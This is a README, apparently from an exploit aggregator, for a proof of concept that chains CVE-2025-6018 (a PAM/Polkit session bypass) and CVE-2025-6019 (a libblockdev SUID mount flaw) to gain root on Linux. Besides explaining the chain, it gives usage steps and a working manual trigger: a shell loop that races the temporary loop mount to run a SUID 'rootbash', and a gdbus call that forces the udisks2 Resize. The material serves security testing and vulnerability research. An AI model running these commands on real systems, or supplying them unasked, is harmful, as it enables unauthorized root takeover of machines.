Share
## https://sploitus.com/exploit?id=A3FCA7C9-347C-53A1-9BD7-A4D9CDE3528B
# CVE-2025-6018 & CVE-2025-6019 PoC

A Proof of Concept for chaining **CVE-2025-6018** (PAM/Polkit Active Session Bypass) and **CVE-2025-6019** (libblockdev SUID Mount Flaw) to achieve Local Privilege Escalation (LPE) on vulnerable Linux systems.

## Disclaimer
This tool is for **educational purposes and authorized testing only**. Do not use this on systems you do not own or have explicit permission to test.

## The Vulnerability Chain
1.  **CVE-2025-6018:** A misconfiguration in PAM/Polkit allows remote SSH sessions to be flagged as `Active=yes`. This grants the user "physical console" privileges, bypassing authentication for hardware management tools like `udisks2`.
2.  **CVE-2025-6019:** The `libblockdev` library (used by `udisks2`) fails to apply the `nosuid` flag when temporarily mounting a filesystem for maintenance operations (like `Resize` or `Repair`).
3.  **The Chain:** By creating a malicious XFS image with a SUID binary, setting up a loop device (allowed via CVE-2025-6018), and triggering a "Resize" via D-Bus (triggering CVE-2025-6019), we can execute the SUID binary during the split-second temporary mount.

## Usage

### Prerequisites
* A user account on the target machine (SSH access).
* `udisks2` and `libblockdev` installed.
* `mkfs.xfs` (optional; script attempts to handle it).

### Exploitation
1.  Clone this repository or upload `exploit.sh` to the target.
2.  Make the script executable:
    ```bash
    chmod +x exploit.sh
    ```
3.  Run the exploit:
    ```bash
    ./exploit.sh
    ```
4.  If successful, you will be dropped into a root shell (`#`).

## ๐Ÿ›  Manual Trigger (If script fails)
If the automated race condition fails, use two terminals:

**Terminal 1 (The Catcher):**
```bash
while true; do 
    VULN_PATH=$(mount | grep "loop0" | grep -v "run/media" | awk '{print $3}')
    if [ -n "$VULN_PATH" ]; then
        $VULN_PATH/rootbash -p
        break
    fi
done
```

**Terminal 2 (The Trigger):**
```bash
gdbus call --system --dest org.freedesktop.UDisks2 \
--object-path /org/freedesktop/UDisks2/block_devices/loop0 \
--method org.freedesktop.UDisks2.Filesystem.Resize 420480256 "{}"
```

### Reference
https://www.helpnetsecurity.com/2025/06/18/chaining-two-lpes-to-get-root-most-linux-distros-vulnerable-cve-2025-6018-cve-2025-6019/